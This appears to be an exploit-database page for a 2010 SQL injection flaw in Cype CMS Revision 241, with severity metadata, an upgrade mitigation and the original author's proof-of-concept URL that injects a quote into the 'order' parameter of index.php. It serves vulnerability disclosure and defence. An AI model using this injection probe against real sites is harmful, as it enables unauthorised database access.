header-logo
Suggest Exploit
vendor:
Cype CMS
by:
Sora
9,3
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Cype CMS
Affected Version From: Revision 241
Affected Version To: Revision 241
Patch Exists: Yes
Related CWE: CVE-2010-0123
CPE: a:cype:cype_cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux (Backtrack 3)
2010

Cype Content Management System Remote SQL Injection Exploit

Cype CMS suffers a remote SQL injection vulnerability in index.php.

Mitigation:

Upgrade to the latest version of Cype CMS.
Source

Exploit-DB raw data:

# Exploit Title: Cype Content Management System Remote SQL Injection Exploit
# Date: January 1st, 2010
# Author: Sora
# Version: Revision 241
# Tested on: Linux (Backtrack 3)

-----------------------------------------

> Cype CMS Remote SQL Injection Exploit
> Author: Sora
> Contact: vhr95zw [at] hotmail [dot] com
> Website: http://greyhathackers.wordpress.com/
> Google Dork: In your dreams, script kiddies.

# Exploit Description:
Cype CMS suffers a remote SQL injection vulnerability in index.php.

# Code/Proof of Concept (PoC):
http://server/index.php?cype=main&page=ranking&order='&job=500

Navigation

Suggest Exploit

Services By CQR